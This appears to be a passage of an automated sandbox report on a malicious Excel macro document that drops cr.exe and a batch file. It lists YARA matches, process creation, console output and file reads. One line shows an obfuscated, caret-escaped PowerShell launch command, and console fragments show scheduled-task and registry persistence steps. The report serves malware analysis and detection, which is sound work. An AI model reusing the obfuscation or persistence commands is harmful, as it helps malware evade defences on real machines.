Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002CCC5D 24_2_002CCC5D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00283CD3 24_2_00283CD3
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002BCF28 24_2_002BCF28
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00289F3B 24_2_00289F3B
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00279FA2 24_2_00279FA2
Document contains embedded VBA macros
Source: ul9kpUwYel.xls OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 002D76B0 appears 153 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 002BED89 appears 75 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0027F4FF appears 176 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 002AFA10 appears 81 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0040F2AF appears 181 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0043F7C0 appears 82 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 002AFE70 appears 51 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 00467460 appears 172 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0044EB39 appears 77 times
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: String function: 0043FC20 appears 61 times
PE file contains more sections than normal
Source: sqlite3.dll.24.dr Static PE information: Number of sections : 18 > 10
PE file contains strange resources
Source: cr.exe.23.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cr.exe.23.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: ul9kpUwYel.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: dump.pcap, type: PCAP Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: C:\Users\user\Documents\pd.bat, type: DROPPED Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: classification engine Classification label: mal100.spyw.expl.evad.winXLS@36/22@17/5
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00437BD1 __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,GetModuleFileNameA,_strlen,_mbstowcs,CreateProcessWithTokenW,CloseHandle,Process32NextW, 24_2_00437BD1
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043433D CoCreateInstance, 24_2_0043433D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\251F0000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cr.exe Mutant created: \Sessions\1\BaseNamedObjects\dfthorbnjuser
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD29.tmp Jump to behavior
Source: ul9kpUwYel.xls OLE indicator, Workbook stream: true
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).....................#.................F...............F.......A.....`IC........v.....................KJ.......).....l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#................p.j....X|................T.............}..v.....|......0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v............0...............h.`.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../................p.j......................T.............}..v.... .......0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................0.......;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.7.T.............}..v....0....... ...............h.`....."....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;................p.j......................T.............}..v....h.......0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).............y=.v....G...............{..j......`...............T.............}..v............0.................)............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G................p.j......................T.............}..v....0.......0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).............y=.v....S...............{..j......`...............T.............}..v....X.......0.................).....^....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S................p.j......................T.............}..v............0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).............y=.v...._...............{..j......`...............T.............}..v............0.................).....Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._................p.j....h.................T.............}..v............0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).............y=.v....k...............{..j......`...............T.............}..v............0.................)............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k................p.j....h.................T.............}..v............0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w....... . . .I.t.e.m.C.o.m.m.a.n.d.......T.............}..v............0...............h.`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w................p.j....@.................T.............}..v............0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ .......{..j......`...............T.............}..v....P.......0...............h.`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................p.j......................T.............}..v............0.................`............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#.................F...............F.......A.....`IC........v.....................KJ.............r....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............[S.j.....r................T.............}..v.....s......0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v....(w......0...............H.i.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../...............[S.j.....w................T.............}..v....`x......0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.9.T.............}..v....p|......0...............H.i....."....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;...............[S.j....(}................T.............}..v.....}......0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G...............;P.j......i...............T.............}..v............0.......................`....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G...............[S.j......................T.............}..v............0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S...............;P.j......i...............T.............}..v....0.......0.......................^....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S...............[S.j......................T.............}..v....h.......0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._...............;P.j......i...............T.............}..v............0.......................`....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._...............[S.j....H.................T.............}..v............0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k...............;P.j......i...............T.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k...............[S.j....H.................T.............}..v............0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w....... . . .o.c.a.t.i.o.n.C.o.m.m.a.n.d.T.............}..v............0...............H.i....."....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w...............[S.j......................T.............}..v............0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ .......;P.j......i...............T.............}..v............0...............H.i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................[S.j....X.................T.............}..v............0.................i............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................................@{ .....................i^Q.......................$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................m.o.d.e........./................................$.J............/............................................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .1.8.,.1. ..............................\Q.....m.o.d.e..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................\Q.....m.o.d.e..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................................@{ .....................i^Q.......................$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................c.o.l.o.r......./................................$.J............/............................................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .F.E. ..................................\Q.....c.o.l.o..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................\Q.....c.o.l.o..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ........................................................................i^Q.......................$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................s.e.t.l.o.c.a.l./................................$.J............/............................................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................\Q.....s.e.t.l..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ...................................................J....................i^Q.....`{.J..............$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................f.o.r...........`{.J.....................\Q.....X%.J.............D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ./.F...........`{.J.....................\Q.....X%.J.............D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .".t.o.k.e.n.s.=.4.-.5. .d.e.l.i.m.s.=... ."...X%.J.............D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .%.i. .i.n. ...=.4.-.5..................\Q.....X%.J.............D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................(.'.v.e.r.'.). .d.o. .5..................\Q.....X%.J.............D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................s.e.t...........d.o. .5..................\Q.....X%.J.............D$.............................x............... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .V.E.R.S.I.O.N.=.%.i...%.j. ............\Q.....s.e.t............D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .................................................D$......................\Q.....x................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................................p.%......................QQ..............i$.....................H................i$............. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............x.......2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................s.e.t............\%.......................$...............%........J....x.......X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .V.E.R.S.I.O.N.=.6...1. ................^Q.....s.e.t....i$.....................(................i$............. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................................=.6...1..................^Q.....s.e.t....i$.....................(................i$............. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................................`{.J....................i^Q......$.J..............$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................i.f. ...........`{.J.....................\Q.....X%.J.............D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................".6...1.". .=.=. .".1.0...0.". ..........\Q.....i.f. ............D$.............X....... ....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................(................D$..................... .......x...............d1.......".v...............................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................\Q.....(................D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................e.c.h.o.........}..v....................|....................................................................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .".W.i.n.d.o.w.s. .1.0. .d.e.t.e.c.t.e.d.". . .e.c.h.o..........D$.....................0....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... ..........D$......................\Q.....x................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................r.e.g...........}..v....................|....................................................... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ..$.............D........................................................]Q.....r.e.g............D$...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D...............1.>......................................]Q......................D$.............8............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. ..................................]Q......................D$.............8............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1......................y\Q......................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D...............t.i.m.e.o.u.t...}..v....................|...............3.......................8............... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D............... ./.t. .2. . ............................]Q.....t.i.m.e..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D...............1.>.....................................9]Q..... ./.t. ..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D...............n.u.l. .................................9]Q..... ./.t. ..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D............... ..... .........d1.......................]Q......................D$.............8............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D...............s.c.h.t.a.s.k.s.}..v....................|.......D.......^....................................... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ..$.............D.......................................................i]Q.....s.c.h.t..........D$...............$.....v....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D...............1.>......................................^Q......................D$.............x............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D...............n.u.l. ..................................^Q......................D$.............x............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1......................9]Q......................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................t.i.m.e.o.u.t...}..v....................|.......................................x............... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ./.t. .3. . ............................^Q.....t.i.m.e..........D$.............H............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>......................................^Q..... ./.t. ..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. ..................................^Q..... ./.t. ..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1.......................^Q......................D$.............x............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................r.e.g...........d1.......................^Q......................D$.............x...............x............... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ..$......................................................................^Q.....r.e.g............D$...............$.....T....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................\Q........J.............D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................). ......................................\Q........J.............D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .................................................D$......................\Q.....x................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................i.f. ...........`{.J.....................\Q.....X%.J.............D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................".6...1.". .=.=. .".6...3.". ............\Q.....i.f. ............D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................(................D$.............................x...............d1.......".v...............................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................\Q.....(................D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................e.c.h.o.........}..v....................|....................................................................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .".W.i.n.d.o.w.s. .8...1. .d.e.t.e.c.t.e.d.". . .c.h.o..........D$.....................2....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... ..........D$......................\Q.....x................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................r.e.g...........}..v....................|....................................................... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ..$......................................................................]Q.....r.e.g............D$...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>......................................]Q......................D$.............8............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. ..................................]Q......................D$.............8............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1......................y\Q......................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................t.i.m.e.o.u.t...}..v....................|...............@.......................8............... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1.......................]Q......................D$.............8............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................s.c.h.t.a.s.k.s.}..v....................|...............f....................................... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ..$.....................................................................i]Q.....s.c.h.t..........D$...............$.....v....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>......................................^Q......................D$.............x............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. ..................................^Q......................D$.............x............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1......................9]Q......................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................t.i.m.e.o.u.t...}..v....................|.......................................x............... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ./.t. .3. . ............................^Q.....t.i.m.e..........D$.............H............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>......................................^Q..... ./.t. ..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. ..................................^Q..... ./.t. ..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1.......................^Q......................D$.............x............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................r.e.g...........d1.......................^Q......................D$.............x...............x............... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ..$......................................................................^Q.....r.e.g............D$...............$.....T....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................\Q........J.............D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................). ......................................\Q........J.............D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .................................................D$......................\Q.....x................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................................`{.J....................i^Q......$.J..............$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................".6...1.". .=.=. .".6...2.". ............\Q.....i.f. ............D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................(................D$.............................x...............d1.......".v...............................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................\Q.....(................D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................e.c.h.o.........}..v....................|....................................................................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .".W.i.n.d.o.w.s. .8. .d.e.t.e.c.t.e.d.". . ...e.c.h.o..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... ..........D$......................\Q.....x................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................r.e.g...........}..v....................|...............$....................................... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ..$......................................................................]Q.....r.e.g............D$...............$............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>......................................]Q......................D$.............8............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. ..................................]Q......................D$.............8............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................t.i.m.e.o.u.t...}..v....................|...............F.......................8............... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ./.t. .2. . ............................]Q.....t.i.m.e..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>.....................................9]Q..... ./.t. ..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. .................................9]Q..... ./.t. ..........D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1.......................]Q......................D$.............8............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................s.c.h.t.a.s.k.s.}..v....................|....................................................... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ..$.....................................................................i]Q.....s.c.h.t..........D$...............$.....v....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>......................................^Q......................D$.............x............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. ..................................^Q......................D$.............x............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................t.i.m.e.o.u.t...}..v....................|.......................................x............... ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D...............). ......................................\Q........J.............D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................D................................D$......................\Q.....x................D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................i.f. ...........`{.J.....................\Q.....X%.J.............D$............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................".6...1.". .=.=. .".6...1.". ............\Q.....i.f. ............D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................C.m.d...........................................(................D$.............X...............x............... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ..$......................................................................\Q.....C.m.d............D$...............$.....j....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................). ..............D$......................\Q.......$..............D$.............X............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d............. ...............B....................... Jump to behavior
Source: C:\Users\user\AppData\Roaming\cr.exe Command line argument: nkF 24_2_00466AC0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\cr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
